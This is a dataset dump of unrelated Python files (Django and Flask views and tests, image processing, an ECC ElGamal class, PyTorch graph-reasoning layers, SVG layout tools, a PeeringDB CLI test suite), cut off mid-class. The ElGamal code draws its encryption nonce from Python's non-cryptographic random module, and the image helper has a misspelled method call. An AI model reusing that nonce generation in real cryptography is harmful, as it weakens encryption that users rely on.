id
stringlengths 3
8
| content
stringlengths 100
981k
|
|---|---|
1695944
|
from freezegun import freeze_time
from openinghours.tests.tests import OpeningHoursTestCase
class FormsTestCase(OpeningHoursTestCase):
def setUp(self):
super(FormsTestCase, self).setUp()
def tearDown(self):
super(FormsTestCase, self).tearDown()
def test_hours_are_published(self):
response = self.client.get('/')
self.assertContains(response, '8:30am to 12:00pm')
self.assertContains(response, '10:00am to 1:00pm')
def test_edit_form(self):
self.tearDown()
post_data = {
'day1_1-opens': '11:30', 'day1_1-shuts': '17:30',
'day2_1-opens': '11:30', 'day2_1-shuts': '17:30',
'day3_1-opens': '11:30', 'day3_1-shuts': '17:30',
'day4_1-opens': '11:30', 'day4_1-shuts': '17:30',
'day5_1-opens': '11:30', 'day5_1-shuts': '17:30',
'day6_1-opens': '11:30', 'day6_1-shuts': '13:30',
'day7_1-opens': '00:00', 'day7_1-shuts': '00:00',
'day1_2-opens': '00:00', 'day1_2-shuts': '00:00',
'day2_2-opens': '00:00', 'day2_2-shuts': '00:00',
'day3_2-opens': '00:00', 'day3_2-shuts': '00:00',
'day4_2-opens': '00:00', 'day4_2-shuts': '00:00',
'day5_2-opens': '00:00', 'day5_2-shuts': '00:00',
'day6_2-opens': '00:00', 'day6_2-shuts': '00:00',
'day7_2-opens': '00:00', 'day7_2-shuts': '00:00',
}
post = self.client.post('/edit/1', post_data)
resp = self.client.get('/edit/1')
self.assertContains(resp, '<option value="11:30" selected', count=6)
self.assertContains(resp, '<option value="17:30" selected', count=5)
self.assertContains(resp, '<option value="00:00">', count=7*2*2)
resp2 = self.client.get('/')
self.assertContains(resp2, '11:30am')
self.assertContains(resp2, '5:30pm')
|
1695967
|
import logging
import requests
from io import BytesIO
from PIL import Image, ImageDraw, ImageFont, ImageOps
import app.data.firestore as data
logger = logging.getLogger('food-flex')
INTERNAL_RES = (1024, 1024)
OUTPUT_RES = (1024, 1024)
FONT_PATH = 'static/DejaVuSans-Bold.ttf'
FONT_BASE_SIZE = int(0.2 * INTERNAL_RES[1])
FONT_SHADOW_SIZE = int(1.125 * FONT_BASE_SIZE)
font_base = ImageFont.truetype(FONT_PATH, FONT_BASE_SIZE)
font_shadow = ImageFont.truetype(FONT_PATH, FONT_SHADOW_SIZE)
def process_image(url, letter):
logger.debug(f'Download & process {url}')
image_loaded = False
try:
response = requests.get(url, timeout=5)
try:
response.raise_for_status()
try:
image = Image.open(BytesIO(response.content))
image = rotate_if_exif_specifies(image)
image_loaded = True
except OSError:
logger.error('Image decoding error')
except requests.HTTPError:
logger.error('HTTP error')
except requests.exceptions.ConnectionError:
logger.error('Network error')
# Replace image with a grey background if it does not load
if not image_loaded:
image = Image.new('RGB', (1, 1), color='grey')
# Scale image to fixed size
image = ImageOps.fit(image, INTERNAL_RES, method=Image.ANTIALIAS)
draw = ImageDraw.Draw(image)
# Draw 'error' if image could not be loaded
if not image_loaded:
pos = (INTERNAL_RES[0] * 0.19, INTERNAL_RES[1] * 0.35)
draw.text(pos, 'error', font=font_shadow, fill='black')
# Add letter to corner of image
x, y = (INTERNAL_RES[0] * 0.05, INTERNAL_RES[1] * 0.01)
draw.text((x, y), letter, font=font_shadow, fill='black')
draw.text((x-1, y-1), letter, font=font_base, fill='white')
# Resize image if needed
if INTERNAL_RES != OUTPUT_RES:
image = image.resize(OUTPUT_RES, Image.NEAREST)
buffer = BytesIO()
image.save(buffer, format='png', compress_level=6)
logger.debug(f'Done, {buffer.tell() // 1024} KB image created ')
buffer.seek(0)
return buffer
def rotate_if_exif_specifies(image):
try:
exif_tags = image._getexif()
if exif_tags is None:
# No EXIF tags, so we don't need to rotate
logger.debug('No EXIF data, so not transforming')
return image
value = exif_tags[274]
except KeyError:
# No rotation tag present, so we don't need to rotate
logger.debug('EXIF data present but no rotation tag, so not transforming')
return image
value_to_transform = {
1: (0, False),
2: (0, True),
3: (180, False),
4: (180, True),
5: (-90, True),
6: (-90, False),
7: (90, True),
8: (90, False)
}
try:
angle, flip = value_to_transform[value]
except KeyError:
logger.warn(f'EXIF rotation \'{value}\' unknown, not transforming')
return image
logger.debug(f'EXIF rotation \'{value}\' detected, rotating {angle} degrees, flip: {flip}')
if angle != 0:
image = image.rotate(angle)
if flip:
image = image.tranpose(Image.FLIP_LEFT_RIGHT)
return image
|
1695975
|
from flask import jsonify, request
from flask_security.recoverable import send_reset_password_instructions
from flask_security.views import _security
from http import HTTPStatus
from werkzeug.datastructures import MultiDict
from .blueprint import frontend, security
from ..decorators import anonymous_user_required
@frontend.route('/login/forgot-password')
@security.route('/reset', methods=['POST'])
@anonymous_user_required
def forgot_password():
"""View function that handles a forgotten password request."""
form = _security.forgot_password_form(MultiDict(request.get_json()))
if form.validate_on_submit():
send_reset_password_instructions(form.user)
else:
return jsonify({'errors': form.errors}), HTTPStatus.BAD_REQUEST
return '', HTTPStatus.NO_CONTENT
|
1696005
|
import random
from os import urandom
from typing import Callable, Tuple
from dataclasses import dataclass
from ecc.curve import Curve, Point
@dataclass
class ElGamal:
curve: Curve
def encrypt(self, plaintext: bytes, public_key: Point,
randfunc: Callable = None) -> Tuple[Point, Point]:
return self.encrypt_bytes(plaintext, public_key, randfunc)
def decrypt(self, private_key: int, C1: Point, C2: Point) -> bytes:
return self.decrypt_bytes(private_key, C1, C2)
def encrypt_bytes(self, plaintext: bytes, public_key: Point,
randfunc: Callable = None) -> Tuple[Point, Point]:
# Encode plaintext into a curve point
M = self.curve.encode_point(plaintext)
return self.encrypt_point(M, public_key, randfunc)
def decrypt_bytes(self, private_key: int, C1: Point, C2: Point) -> bytes:
M = self.decrypt_point(private_key, C1, C2)
return self.curve.decode_point(M)
def encrypt_point(self, plaintext: Point, public_key: Point,
randfunc: Callable = None) -> Tuple[Point, Point]:
randfunc = randfunc or urandom
# Base point G
G = self.curve.G
M = plaintext
random.seed(randfunc(1024))
k = random.randint(1, self.curve.n)
C1 = k * G
C2 = M + k * public_key
return C1, C2
def decrypt_point(self, private_key: int, C1: Point, C2: Point) -> Point:
M = C2 + (self.curve.n - private_key) * C1
return M
|
1696047
|
import os
import sys
import re
import types
import itertools
import matplotlib.pyplot as plt
import numpy
import scipy.stats
import numpy.ma
import Stats
import Histogram
from CGATReport.Tracker import *
from cpgReport import *
##########################################################################
class replicatedIntervalsPerContig(cpgTracker):
"""Summary stats of intervals called by the peak finder. """
mPattern = "_replicated_intervals$"
def __call__(self, track, slice=None):
data = self.getAll( """SELECT i.Contig, g.length as Contig_length, m.mappable_bases, B.repeat_length, COUNT(i.interval_id) as Intervals, A.Predicted_CGIs,
round(COUNT(i.interval_id)/(m.mappable_bases/1000000.0),2) as CAPseq_density,
round(AVG(i.length),0) as Mean_length, round(AVG(i.nprobes),0) as Mean_reads
FROM %(track)s_replicated_intervals i, annotations.genome g, annotations.mappable_bases_per_contig m,
(select contig, COUNT(id) as Predicted_CGIs from cgi_intervals group by contig) as A,
(select contig, sum(stop-start) as repeat_length from annotations.repeats group by contig) B
WHERE i.contig=g.id AND A.contig=i.contig
AND B.contig=i.contig AND m.contig=i.contig
GROUP BY i.contig ORDER BY g.length desc LIMIT 100;""" )
headers = ("Contig length", "CAPseq Intervals", "Predicted CGIs",
"CAPseq Density", "Mean Interval Length", "Mean Interval Reads")
n = odict()
for d in data:
contig = d[:1]
n[str(contig)] = odict(list(zip(headers, d[2:])))
#result = zip(headers, zip(*data))
return data
|
1696085
|
from sources.base.interface import DownloadableSource
from utils import file
from downloaders import BaseDownloader
from sources.base import BaseSource
class TextSource(BaseSource,DownloadableSource):
__source_name__ = "text"
def __init__(self, url, headers, filename,filecontent):
self.url = url
self.headers = headers
self.filename = filename
self.filecontent = filecontent
@property
def suffix(self):
return self.filename.split(".")[-1]
def download(self, downloader: BaseDownloader, saveroute, **kwargs):
if (self.url == ""):
file.writeToFile(self.filecontent,saveroute,self.filename)
else:
downloader.download(self.url, saveroute, self.filename, headers = self.headers,**kwargs)
|
1696091
|
import torch
from torch import nn
import numpy as np
import cv2
### FB Global Reasoning Block ###
# From: https://github.com/facebookresearch/GloRe
class GCN(nn.Module):
""" Graph convolution unit (single layer)
"""
def __init__(self, num_state, num_node, bias=False):
super(GCN, self).__init__()
self.conv1 = nn.Conv1d(num_node, num_node, kernel_size=1)
self.relu = nn.ReLU(inplace=True)
self.conv2 = nn.Conv1d(num_state, num_state, kernel_size=1, bias=bias)
def forward(self, x):
# (n, num_state, num_node) -> (n, num_node, num_state)
# -> (n, num_state, num_node)
h = self.conv1(x.permute(0, 2, 1).contiguous()).permute(0, 2, 1)
h = h + x
# (n, num_state, num_node) -> (n, num_state, num_node)
h = self.conv2(self.relu(h))
return h
############### GloRe ################################
class GloRe_Unit(nn.Module):
"""
Graph-based Global Reasoning Unit
Parameter:
'normalize' is not necessary if the input size is fixed
"""
def __init__(self, num_in, num_mid,
ConvNd=nn.Conv3d,
BatchNormNd=nn.BatchNorm3d,
normalize=False):
super(GloRe_Unit, self).__init__()
self.normalize = normalize
self.num_s = int(2 * num_mid)
self.num_n = int(1 * num_mid)
# reduce dim
self.conv_state1 = ConvNd(num_in, self.num_s, kernel_size=1)
self.conv_state3 = ConvNd(num_in, self.num_s, kernel_size=3, padding=1)
self.conv_state5 = ConvNd(num_in, self.num_s, kernel_size=5, padding=2)
self.maxpool_state = nn.MaxPool2d(kernel_size=3, padding=1, stride=1)
self.conv_statem = ConvNd(num_in, self.num_s, kernel_size=1)
# projection map
self.conv_proj1 = ConvNd(int(num_in/2), self.num_n, kernel_size=1)
self.conv_proj3 = ConvNd(int(num_in/2), self.num_n, kernel_size=3, padding=1)
self.conv_proj5 = ConvNd(int(num_in/2), self.num_n, kernel_size=5, padding=2)
self.maxpool_proj = nn.MaxPool2d(kernel_size=3, padding=1, stride=1)
self.conv_projm = ConvNd(int(num_in/2), self.num_n, kernel_size=1)
# ----------
# reasoning via graph convolution
self.gcn1 = GCN(num_state=self.num_s, num_node=self.num_n)
self.gcn3 = GCN(num_state=self.num_s, num_node=self.num_n)
self.gcn5 = GCN(num_state=self.num_s, num_node=self.num_n)
self.gcnm = GCN(num_state=self.num_s, num_node=self.num_n)
# ----------
# extend dimension
self.conv_extend1 = ConvNd(self.num_s, num_in, kernel_size=1, bias=False)
self.conv_extend3 = ConvNd(self.num_s, num_in, kernel_size=3, padding=1, bias=False)
self.conv_extend5 = ConvNd(self.num_s, num_in, kernel_size=5, padding=2, bias=False)
self.conv_extendm = ConvNd(self.num_s, num_in, kernel_size=1, bias=False)
#Concatenation and reduction
self.original_size = ConvNd(5*num_in, num_in, kernel_size=1, bias=False)
self.blocker = BatchNormNd(num_in, eps=1e-04) # should be zero initialized
def forward(self, x, x_proj):
'''
:param x: (n, c, d, h, w)
'''
n = x.size(0)
#print(x.shape)
# (n, num_in, h, w) --> (n, num_state, h, w)
# --> (n, num_state, h*w)
x_state_reshaped1 = self.conv_state1(x).view(n, self.num_s, -1)
x_state_reshaped3 = self.conv_state3(x).view(n, self.num_s, -1)
x_state_reshaped5 = self.conv_state5(x).view(n, self.num_s, -1)
x_state_reshapedm = self.conv_statem(self.maxpool_state(x)).view(n, self.num_s, -1)
# (n, num_in, h, w) --> (n, num_node, h, w)
# --> (n, num_node, h*w)
x_proj_reshaped1 = self.conv_proj1(x_proj).view(n, self.num_n, -1)
x_proj_reshaped3 = self.conv_proj3(x_proj).view(n, self.num_n, -1)
x_proj_reshaped5 = self.conv_proj5(x_proj).view(n, self.num_n, -1)
x_proj_reshapedm = self.conv_projm(self.maxpool_proj(x_proj)).view(n, self.num_n, -1)
# (n, num_in, h, w) --> (n, num_node, h, w)
# --> (n, num_node, h*w)
x_rproj_reshaped1 = x_proj_reshaped1
x_rproj_reshaped3 = x_proj_reshaped3
x_rproj_reshaped5 = x_proj_reshaped5
x_rproj_reshapedm = x_proj_reshapedm
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# projection: coordinate space -> interaction space
# (n, num_state, h*w) x (n, num_node, h*w)T --> (n, num_state, num_node)
x_n_state1 = torch.matmul(x_state_reshaped1, x_proj_reshaped1.permute(0, 2, 1))
if self.normalize:
x_n_state1 = x_n_state1 * (1. / x_state_reshaped1.size(2))
x_n_state3 = torch.matmul(x_state_reshaped3, x_proj_reshaped3.permute(0, 2, 1))
if self.normalize:
x_n_state3 = x_n_state3 * (1. / x_state_reshaped3.size(2))
x_n_state5 = torch.matmul(x_state_reshaped5, x_proj_reshaped5.permute(0, 2, 1))
if self.normalize:
x_n_state5 = x_n_state5 * (1. / x_state_reshaped5.size(2))
x_n_statem = torch.matmul(x_state_reshapedm, x_proj_reshapedm.permute(0, 2, 1))
if self.normalize:
x_n_statem = x_n_statem * (1. / x_state_reshapedm.size(2))
# reasoning: (n, num_state, num_node) -> (n, num_state, num_node)
x_n_rel1 = self.gcn1(x_n_state1)
x_n_rel3 = self.gcn3(x_n_state3)
x_n_rel5 = self.gcn5(x_n_state5)
x_n_relm = self.gcnm(x_n_statem)
# reverse projection: interaction space -> coordinate space
# (n, num_state, num_node) x (n, num_node, h*w) --> (n, num_state, h*w)
x_state_reshaped1 = torch.matmul(x_n_rel1, x_rproj_reshaped1)
x_state_reshaped3 = torch.matmul(x_n_rel3, x_rproj_reshaped3)
x_state_reshaped5 = torch.matmul(x_n_rel5, x_rproj_reshaped5)
x_state_reshapedm = torch.matmul(x_n_relm, x_rproj_reshapedm)
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# (n, num_state, h*w) --> (n, num_state, h, w)
x_state1 = x_state_reshaped1.view(n, self.num_s, *x.size()[2:])
x_state3 = x_state_reshaped3.view(n, self.num_s, *x.size()[2:])
x_state5 = x_state_reshaped5.view(n, self.num_s, *x.size()[2:])
x_statem = x_state_reshapedm.view(n, self.num_s, *x.size()[2:])
# -----------------
# (n, num_state, h, w) -> (n, num_in, h, w)
x_reasoned1 = self.blocker(self.conv_extend1(x_state1))
x_reasoned3 = self.blocker(self.conv_extend3(x_state3))
x_reasoned5 = self.blocker(self.conv_extend5(x_state5))
x_reasonedm = self.blocker(self.conv_extendm(x_statem))
out = x + x_reasoned1 + x_reasoned3 + x_reasoned5 + x_reasonedm
#out = torch.cat((x, x_reasoned1, x_reasoned3, x_reasoned5, x_reasonedm),1)
#out = self.original_size(out)
# for i in range(3):
# img = np.asarray(x_proj_reshaped1[0][i].cpu().detach().view(x.shape[2],x.shape[3]))
# img = ((255.0*(img-img.min()))/(img.max()-img.min()))
# cv2.imwrite("./deepglobe_exp/Inception_Glore_seg/projection/projection_1_{}.jpg".format(i),np.asarray(img))
# img = np.asarray(x_proj_reshaped3[0][i].cpu().detach().view(x.shape[2],x.shape[3]))
# img = ((255.0*(img-img.min()))/(img.max()-img.min()))
# cv2.imwrite("./deepglobe_exp/Inception_Glore_seg/projection/projection_3_{}.jpg".format(i),np.asarray(img))
# img = np.asarray(x_proj_reshaped5[0][i].cpu().detach().view(x.shape[2],x.shape[3]))
# img = ((255.0*(img-img.min()))/(img.max()-img.min()))
# cv2.imwrite("./deepglobe_exp/Inception_Glore_seg/projection/projection_5_{}.jpg".format(i),np.asarray(img))
# img = np.asarray(x_proj_reshapedm[0][i].cpu().detach().view(x.shape[2],x.shape[3]))
# img = ((255.0*(img-img.min()))/(img.max()-img.min()))
# cv2.imwrite("./deepglobe_exp/Inception_Glore_seg/projection/projection_max_{}.jpg".format(i),np.asarray(img))
# img = np.asarray(x_proj[0][i].cpu().detach().view(x.shape[2],x.shape[3]))
# img = ((255.0*(img-img.min()))/(img.max()-img.min()))
# cv2.imwrite("./deepglobe_exp/Inception_Glore_seg/projection/x_proj_in_{}.jpg".format(i),np.asarray(img))
# img = np.asarray(x[0][i].cpu().detach().view(x.shape[2],x.shape[3]))
# img = ((255.0*(img-img.min()))/(img.max()-img.min()))
# cv2.imwrite("./deepglobe_exp/Inception_Glore_seg/projection/x_{}.jpg".format(i),np.asarray(img))
# img = np.asarray(out[0][i].cpu().detach().view(x.shape[2],x.shape[3]))
# img = ((255.0*(img-img.min()))/(img.max()-img.min()))
# cv2.imwrite("./deepglobe_exp/Inception_Glore_seg/projection/out_{}.jpg".format(i),np.asarray(img))
return out
class Inception_GloRe_Unit_2D(GloRe_Unit):
def __init__(self, num_in, num_mid, normalize=False):
"""
Set 'normalize = True' if the input size is not fixed
"""
super(Inception_GloRe_Unit_2D, self).__init__(num_in, num_mid,
ConvNd=nn.Conv2d,
BatchNormNd=nn.BatchNorm2d,
normalize=normalize)
############### GloRe ################################
class GloRe_Unit_v2(nn.Module):
"""
Graph-based Global Reasoning Unit
Parameter:
'normalize' is not necessary if the input size is fixed
"""
def __init__(self, num_in, num_mid,
ConvNd=nn.Conv3d,
BatchNormNd=nn.BatchNorm3d,
normalize=False):
super(GloRe_Unit_v2, self).__init__()
self.normalize = normalize
self.num_s = int(2 * num_mid)
self.num_n = int(1 * num_mid)
# reduce dim
self.conv1_state = ConvNd(num_in, self.num_s, kernel_size=1) #1x1 Convolutional layer (reduce dim)
self.conv3_state = ConvNd(num_in, self.num_s, kernel_size=3, padding=1) #3x3 Convolutional layer (reduce dim)
self.conv5_state = ConvNd(num_in, self.num_s, kernel_size=5, padding=2) #5x5 Convolutional layer (reduce dim)
self.maxpool_state = nn.MaxPool2d(kernel_size=3, padding=1, stride=1) #Max pooling layer (reduce dim)
self.maxconv1_state = ConvNd(num_in, self.num_s, kernel_size=1) #max pooling 1x1 conv layer (reduce dim)
self.concat1_state = ConvNd(4, 1, kernel_size=1) #concat 1x1 conv layer (reduce dim)
# projection map
self.conv1_proj = ConvNd(num_in, self.num_n, kernel_size=1) #1x1 Convolutional layer (proj)
self.conv3_proj = ConvNd(num_in, self.num_n, kernel_size=3, padding=1) #3x3 Convolutional layer (proj)
self.conv5_proj = ConvNd(num_in, self.num_n, kernel_size=5, padding=2) #5x5 Convolutional layer (proj)
self.maxpool_proj = nn.MaxPool2d(kernel_size=3, padding=1, stride=1) #Max pooling layer (proj)
self.maxconv1_proj = ConvNd(num_in, self.num_n, kernel_size=1) #max pooling 1x1 conv layer (proj)
self.concat1_proj = ConvNd(4, 1, kernel_size=1) #concat 1x1 conv layer (proj)
# ----------
# reasoning via graph convolution
self.gcn = GCN(num_state=self.num_s, num_node=self.num_n)
# ----------
# extend dimension
self.conv_extend = ConvNd(self.num_s, num_in, kernel_size=1, bias=False)
self.blocker = BatchNormNd(num_in, eps=1e-04) # should be zero initialized
def forward(self, x, print_features=False):
'''
:param x: (n, c, d, h, w)
'''
n = x.size(0)
#print(x.shape)
# (n, num_in, h, w) --> (n, num_state, h, w)
# --> (n, num_state, h*w)
x_state_reshaped1 = self.conv1_state(x).view(n, 1, self.num_s, -1)
x_state_reshaped3 = self.conv3_state(x).view(n, 1, self.num_s, -1)
x_state_reshaped5 = self.conv5_state(x).view(n, 1, self.num_s, -1)
x_state_reshapedm = self.maxconv1_state(self.maxpool_state(x)).view(n, 1, self.num_s, -1)
x_state_concat = torch.cat((x_state_reshaped1, x_state_reshaped3, x_state_reshaped5, x_state_reshapedm), 1)
x_state_reshaped = self.concat1_state(x_state_concat).view(n, self.num_s, -1)
# (n, num_in, h, w) --> (n, num_node, h, w)
# --> (n, num_node, h*w)
x_proj_reshaped1 = self.conv1_proj(x).view(n, 1, self.num_n, -1)
x_proj_reshaped3 = self.conv3_proj(x).view(n, 1, self.num_n, -1)
x_proj_reshaped5 = self.conv5_proj(x).view(n, 1, self.num_n, -1)
x_proj_reshapedm = self.maxconv1_proj(self.maxpool_proj(x)).view(n, 1, self.num_n, -1)
x_proj_concat = torch.cat((x_proj_reshaped1, x_proj_reshaped3, x_proj_reshaped5, x_proj_reshapedm), 1)
x_proj_reshaped = self.concat1_proj(x_proj_concat).view(n, self.num_n, -1)
# (n, num_in, h, w) --> (n, num_node, h, w)
# --> (n, num_node, h*w)
x_rproj_reshaped = x_proj_reshaped
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# projection: coordinate space -> interaction space
# (n, num_state, h*w) x (n, num_node, h*w)T --> (n, num_state, num_node)
x_n_state = torch.matmul(x_state_reshaped, x_proj_reshaped.permute(0, 2, 1))
if self.normalize:
x_n_state = x_n_state * (1. / x_state_reshaped.size(2))
# reasoning: (n, num_state, num_node) -> (n, num_state, num_node)
x_n_rel = self.gcn(x_n_state)
# reverse projection: interaction space -> coordinate space
# (n, num_state, num_node) x (n, num_node, h*w) --> (n, num_state, h*w)
x_state_reshaped = torch.matmul(x_n_rel, x_rproj_reshaped)
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# (n, num_state, h*w) --> (n, num_state, h, w)
x_state = x_state_reshaped.view(n, self.num_s, *x.size()[2:])
# -----------------
# (n, num_state, h, w) -> (n, num_in, h, w)
x_reasoned = self.blocker(self.conv_extend(x_state))
out = x + x_reasoned
if print_features:
for i in range(4):
img = np.asarray(x_state_reshaped[0][i].cpu().detach().view(x.shape[2],x.shape[3]))
img = ((255.0*(img-img.min()))/(img.max()-img.min()))
cv2.imwrite("./deepglobe_exp/Inception_Glore_seg_v2/projection/x_state_{}.jpg".format(i),np.asarray(img))
img = np.asarray(x_state_reshaped[0][i].cpu().detach().view(x.shape[2],x.shape[3]))
img = ((255.0*(img-img.min()))/(img.max()-img.min()))
cv2.imwrite("./deepglobe_exp/Inception_Glore_seg_v2/projection/x_proj_{}.jpg".format(i),np.asarray(img))
img = np.asarray(x[0][i].cpu().detach().view(x.shape[2],x.shape[3]))
img = ((255.0*(img-img.min()))/(img.max()-img.min()))
cv2.imwrite("./deepglobe_exp/Inception_Glore_seg_v2/projection/x_{}.jpg".format(i),np.asarray(img))
img = np.asarray(out[0][i].cpu().detach().view(x.shape[2],x.shape[3]))
img = ((255.0*(img-img.min()))/(img.max()-img.min()))
cv2.imwrite("./deepglobe_exp/Inception_Glore_seg_v2/projection/out_{}.jpg".format(i),np.asarray(img))
return out
class Inception_GloRe_Unit_2D_v2(GloRe_Unit_v2):
def __init__(self, num_in, num_mid, normalize=False):
"""
Set 'normalize = True' if the input size is not fixed
"""
super(Inception_GloRe_Unit_2D_v2, self).__init__(num_in, num_mid,
ConvNd=nn.Conv2d,
BatchNormNd=nn.BatchNorm2d,
normalize=normalize)
|
1696101
|
from xml.dom import minidom
from .svg_to_axes import FigureLayout, repar, tounit, XMLNS, get_elements_by_attr
import copy
import matplotlib.pyplot as plt
import numpy as np
import pkg_resources
def get_empty_svg_document(tmp_filename=".fifi_tmp.svg"):
"""
Creates basic svg template file and saves it to disk. Returns the filename.
"""
doc = minidom.Document()
svg = doc.createElement("svg")
attributes = {
"xmlns:figurefirst": "http://flyranch.github.io/figurefirst/",
"xmlns:dc": "http://purl.org/dc/elements/1.1/",
"xmlns:cc": "http://creativecommons.org/ns#",
"xmlns:rdf": "http://www.w3.org/1999/02/22-rdf-syntax-ns#",
"xmlns:svg": "http://www.w3.org/2000/svg",
"xmlns": "http://www.w3.org/2000/svg",
"xmlns:inkscape": "http://www.inkscape.org/namespaces/inkscape",
"width": "6in",
"height": "3in",
"viewBox": "0 0 432 216",
"id": "svg2",
"version": "1.1",
"inkscape:version": "0.91 r13725",
}
for attribute, value in attributes.items():
svg.setAttribute(attribute, value)
doc.appendChild(svg)
outfile = open(tmp_filename, "w")
doc.writexml(outfile, encoding="utf-8")
return tmp_filename
def set_figure_size(fig, layout):
svg = layout.output_xml.getElementsByTagName("svg")[0]
width, height = fig.get_size_inches()
svg.setAttribute("width", repar(width, "in"))
svg.setAttribute("height", repar(height, "in"))
viewBox = "0 0 " + str(width * 72) + " " + str(height * 72)
svg.setAttribute("viewBox", viewBox)
return layout
def load_template_svg():
tmp_filename = get_empty_svg_document()
return FigureLayout(tmp_filename)
def create_rect_for_ax(layout, parent, ax, name):
new_rect = layout.output_xml.createElement("rect")
figurefirst_axis_tag = layout.output_xml.createElementNS(XMLNS, "figurefirst:axis")
figurefirst_axis_tag.setAttribute("figurefirst:name", name)
bbox = ax.get_position()
width, height = ax.figure.get_size_inches()
# set default attributes
attributes = {
u"x": unicode(width * tounit([bbox.x0, "in"], "px")),
u"y": unicode(height * tounit([1 - bbox.y0 - bbox.height, "in"], "px")),
u"width": unicode(width * tounit([bbox.width, "in"], "px")),
u"height": unicode(height * tounit([bbox.height, "in"], "px")),
}
for attribute, value in attributes.items():
new_rect.setAttribute(attribute, value)
new_rect.appendChild(figurefirst_axis_tag)
parent.appendChild(new_rect)
def mpl_fig_to_figurefirst_svg(
mpl_fig,
output_filename,
design_layer_name="mpl_design_layer",
figurefirst_figure_name="mpl_output_layer",
):
"""
Given a matplotlib figure (mpl_fig) with multiple axes, this function creates an
svg file (output_filename) that conforms to the figurefirst specs with rectangles
drawn and tagged for each matplotlib axis. The axes are grouped together under a
figurefirst:figure tag (name:mpl_output_layer), and the layout is saved to svg.
"""
layout = load_template_svg()
layout = set_figure_size(mpl_fig, layout)
layout.create_new_targetlayer(design_layer_name)
output_svg = layout.output_xml.getElementsByTagName("svg")[0]
layer = get_elements_by_attr(output_svg, "inkscape:label", design_layer_name)[0]
group = layout.output_xml.createElement("g")
layer.appendChild(group)
figurefirst_figure_tag = layout.output_xml.createElementNS(
XMLNS, "figurefirst:figure"
)
figurefirst_figure_tag.setAttribute("figurefirst:name", figurefirst_figure_name)
group.appendChild(figurefirst_figure_tag)
for i, ax in enumerate(mpl_fig.axes):
create_rect_for_ax(layout, group, ax, "ax" + str(i))
layout.write_svg(output_filename)
layout = FigureLayout(output_filename, make_mplfigures=True)
return layout
def add_mpl_fig_to_figurefirst_svg(
fifi_svg_filename,
mpl_fig,
output_filename,
design_layer_name="mpl_design_layer",
figurefirst_figure_name="mpl_template",
):
layout = FigureLayout(fifi_svg_filename)
layout.create_new_targetlayer(design_layer_name)
output_svg = layout.output_xml.getElementsByTagName("svg")[0]
layer = get_elements_by_attr(output_svg, "inkscape:label", design_layer_name)[0]
group = layout.output_xml.createElement("g")
layer.appendChild(group)
figurefirst_figure_tag = layout.output_xml.createElementNS(
XMLNS, "figurefirst:figure"
)
figurefirst_figure_tag.setAttribute("figurefirst:name", figurefirst_figure_name)
group.appendChild(figurefirst_figure_tag)
for i, ax in enumerate(mpl_fig.axes):
create_rect_for_ax(layout, group, ax, "ax" + str(i))
layout.write_svg(output_filename)
layout = FigureLayout(output_filename, make_mplfigures=True)
return layout
|
1696133
|
FILE = 'tests/__init__.py'
MESSAGE = 'This is a test.'
RESPONSE_DATA = {'status': 1, 'message': 'fail'}
SERVERS_AND_FILES = (
('https://vim.cx', FILE), # PrivateBin 1.3
('https://privatebin.gittermann1.de/', FILE), # PrivateBin 1.2
('https://paste.carrade.eu/', FILE), # PrivateBin 1.1
# ('https://paste.nikul.in/', None), # PrivateBin 1.0 (Host offline)
)
__all__ = ('MESSAGE', 'RESPONSE_DATA', 'SERVERS_AND_FILES')
|
1696139
|
from adafruit_circuitplayground.express import cpx
import time
while True:
print(cpx.button_a)
time.sleep(0.05)
|
1696176
|
import pytest
import os, re, io
import helper
import peeringdb
from peeringdb import cli as _cli
CMD = "peeringdb_test"
client = helper.client_fixture("full")
# Run with config dir
class RunCli:
def __init__(self, c):
self.config_dir = str(c)
def __call__(self, *args):
fullargs = [CMD]
fullargs.extend(["-C", self.config_dir])
fullargs.extend(args)
return _cli.main(fullargs)
@pytest.fixture
def runcli(config0_dir):
return RunCli(config0_dir)
def test_basic():
assert _cli.main([CMD]) != 0
assert _cli.main([CMD, "-h"]) == 0
def test_version():
assert _cli.main([CMD, "--version"]) == 0
def test_config(runcli):
assert _cli.main([CMD, "--config-dir", runcli.config_dir]) != 0
assert runcli("config", "show") == 0
assert runcli("config", "list-codecs") == 0
# todo:
# check default creation- monkeypatch to avoid clobbering user dir
# pass a config and check that it matches
# config set
NET0 = "net7"
def test_get(runcli, client):
assert runcli("get") != 0
assert runcli("get", NET0) == 0
assert runcli("get", NET0, "--depth", "1") == 0
assert runcli("get", NET0, "-D", "2") == 0
def test_get_empty(runcli, client_empty):
assert runcli("get", NET0) != 0
assert runcli("get", NET0, "-R") == 0
def test_whois(runcli, client):
assert runcli("whois") != 0
assert runcli("whois", NET0) == 0
assert runcli("whois", "org7") == 0
assert runcli("whois", "as63312") == 0
assert runcli("whois", "as00000") == 1
assert runcli("whois", "ixnets7") == 0
assert runcli("whois", "ixnets0") == 1
def test_droptables(runcli, client, monkeypatch):
# not empty before drop?
assert client.tags.net.all()
# pass in "yes" confirmation
monkeypatch.setattr("sys.stdin", io.StringIO("yes"))
assert runcli("drop-tables") == 0
# empty after drop?
assert not client.tags.net.all()
# Test client/server version errors; should fail with clean output
def test_version_check(
runcli, client_empty, patch_version, patch_backend_version, capsys
):
with patch_version:
assert runcli("get", NET0, "-R") != 0
out, err = capsys.readouterr()
assert err.count("\n") < 2
with patch_backend_version:
assert runcli("get", NET0, "-R") != 0
# Make sure CLI output is piped to stdout
@pytest.mark.output
def test_output_piping(runcli, client, capsys):
assert runcli("sync") == 0
out, err = capsys.readouterr()
assert err == ""
assert re.search("Fetching", out)
assert re.search("Updates", out)
@pytest.mark.output
# Check sanity of output volume
def test_verbosity(runcli, client, capsys):
assert runcli("sync", "-v") == 0
outv, errv = capsys.readouterr()
assert runcli("sync", "-q") == 0
outq, errq = capsys.readouterr()
# Verbose output should be longer
assert len(outq) < len(outv)
|
1696198
|
import random
class Teacher:
"""
A class to implement a teacher that knows the optimal playing strategy.
Teacher returns the best move at any time given the current state of the game.
Note: things are a bit more hard-coded here, as this was not the main focus of
the exercise so I did not spend as much time on design/style. Everything works
properly when tested.
Parameters
----------
level : float
teacher ability level. This is a value between 0-1 that indicates the
probability of making the optimal move at any given time.
"""
def __init__(self, level=0.9):
"""
Ability level determines the probability that the teacher will follow
